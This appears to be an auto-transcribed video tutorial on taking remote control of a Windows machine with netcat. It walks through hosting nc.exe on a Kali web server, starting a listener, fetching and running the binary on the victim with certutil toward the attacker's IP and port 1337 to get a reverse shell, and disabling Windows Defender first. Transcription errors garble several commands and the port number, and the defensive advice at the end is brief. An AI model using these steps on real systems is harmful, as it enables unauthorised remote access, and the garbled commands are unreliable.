Hello guys, today I would like to show you how to pawn a machine or remotely control a machine using basically netcat, and it should take you for about 2 minutes to do. Right, now if you stick to the end of the video, I will show you how to secure your machine, because I've actually tested on it. Basically it's very easy to secure your machine against this type of attack, and I will explain some additional critical information that you should know or need to know to progress. So as you can see, I'm running already some commands. I'll show you everything, right? So all you need to do is, first of all, is locate ncaxe. And as you can see, the file path is here. You need to do sudo cp user share windows resources binaries ncexe. Now copy this to /var/www.html/ and now top secret exe is my name for the file. You can name it whatever you want. You can keep it encexe, you can keep it 123, but at the end of it, it has to be exe, right? Which is important because it's a executable. Especially if you want to run on Windows, it's very important. Now at the end, you're just going to do nc-nvlp1337 or whatever port you want, right? Whatever port you want, it doesn't matter. So just something basic, like maybe 1234, 4321, whatever you want, 555, I don't know, 666, whatever you want really. Now we're gonna go to virtual machine, and as you can see, we need to run this command, right? So cert2 -eurocache -split -f http the IP address of your attacker. I'll show you in a minute how to get your IP address of your attacker machine. /top secret exe, top secret exe. It's important that you run it twice, because this basically downloads it and this runs it, right? So I'll show you how to get your virtual your Kali's machine IP address. Go to your terminal, ifconfig. For Windows it's ipconfig, right? And you take this IP address, and this is your attacker. This is your lhost, right? Lhost attacking IP address. Airhost is the victim, remote host, right? There's two different things that we need to know. Okay, so we're just gonna back to our Windows, and we're just gonna run this command. It should download the top secret information. Now, however, this is important as well. Before you download, you need to basically disable your antivirus, your Windows Defender, right? Because if you don't disable it, it won't work. And for some reason, I can't get it to work. There we go. So settings, and just turn it off. Now, because you're turning off, and if you're using a virtual machine, you can disable your Wi-Fi, so you disable your Windows Defender safely. Now, if you're doing this without the virtual machine and you're doing it on your host machine, I suggest you never ever turn off your firewall, right? Firewall is what keeps you safe. It's like if you were to disable your firewall and possibly leave your computer to be, you know, out in the open, it's basically like open your front door to the thief, right? Or the, I don't know, robbers, whatever you want to call them. So I suggest you don't, because I'm using a virtual machine and I'm not really afraid of the hackers, because, yeah, whatever. I'm not really scared, so I just turn it off right now. I'm using a virtual machine, as I said, as well, so I'm really safe. If you're very paranoid, whatever, being hacked, just disable your internet. Just disable your internet, right? Just Ethernet and disable. It might cause some problems, but it'll make you double safe, right? So if you're really scared, just disable this. Now, if you're gonna run this command in a second, and just before I finish actually running the command, I forgot about the port. So the port is, what did I put it? I think 13137. Yes, okay. So the port is important as well. The port needs to be whatever you put in Kali, right? So top secret.exe cmd 192.168.11.139.1337. When you run this command, hopefully it runs. It should run. There we go. As you can see, there we go. As you can see, we have pawned the machine successfully. Now, important information is, as soon as you turn your firewall, we can close this actually, I'm pretty sure. Never mind, we can close this. So you need to keep this open. Now, this is actually, I tested it myself. So we just actually, but to be honest, to run this command now, all we need to do is ncexe, sorry, top secret exe There we go. And now this keeps us connected to the machine. And we need to do as well this command, right? And we need to run the command again. There we go. And that keeps us connected. We're connected to the machine. Now, how do we know if someone's connected to our machine? I'll show you. So basically, if you're in Windows, you can just standard CMD and you just do netcat. And it should show that someone's connected to our computer in a second. There we go. As you can see, right, this is us. But as you can see, that's some local IP address. If it's a local, not like example, right? Because you're gonna say, okay, whoa, you're gonna run netcat, you're gonna see all these IP addresses. No, that doesn't mean someone's connected to your computer. If it says to like this IP address, right? It says HTTPS. That's just basically either it's you're connected to the internet, or it could be like example if you're running a browser. As you can see, let's just go on Google. I'll show you, for example, if you go on Google. Alright, let's just go on Google, whatever, it doesn't matter where you go. And the example is netcat again. As you can see, there's just lots of stuff, more IP addresses. Right, as you can see, there's lots of IP addresses that just some additional. This is your basically loopback address. Am I still connected? Yes. Yes, okay. So as you can see, we're still connected and it just doesn't show it, that's fine. But as you can see, TCP, this is our IP address, right? I'll show you. To run another CMD. ipconfig/all, and as you can see, the IP address is this. This is our IPv4 address preferred, right? As you can see, this is our IP address and this is our attacker machine address, right? And we're using port 1337. Now, this is how you sort of know if someone's connected to your machine. If you run on your computer right now, there most likely isn't anything like this connected, unless you have someone connected to it, like example SSH or Telnet or whatever, or like a remote desktop. Now we're gonna ask what we can do with this sort of IP address. With this connection. Well, basically anything, because we're in charge of this computer, right? Unless the victim attack turns on the firewall, then we're fucked, because the firewall will delete the netcat, and netcat is basically what keeps us connected. So in a second, I'm going to tell you what we can do, like how to protect ourselves. So now I'll tell you how to protect yourself. So basically, to protect yourself, all you need to do is make sure your firewall is always up to date, always turned on, and you should have a third party antivirus. Now, the reason I'm saying this, because this seems obvious, right? But for my friend, it didn't sound obvious, because what she was trying to do, she was trying to install a program, and the program turned out to be Trojan. And she told me that, I was like, well, what about your firewall? Like, because that keeps you protected. And she's like, yeah, I turned it off because the firewall didn't allow me to install it. I was like, well, but did you not think that was the reason? There's something wrong with the program? And she said, no. I was like, oh my god. Oh, anyways, hope you've enjoyed the video. If you can subscribe, leave a comment, and see you in the next video.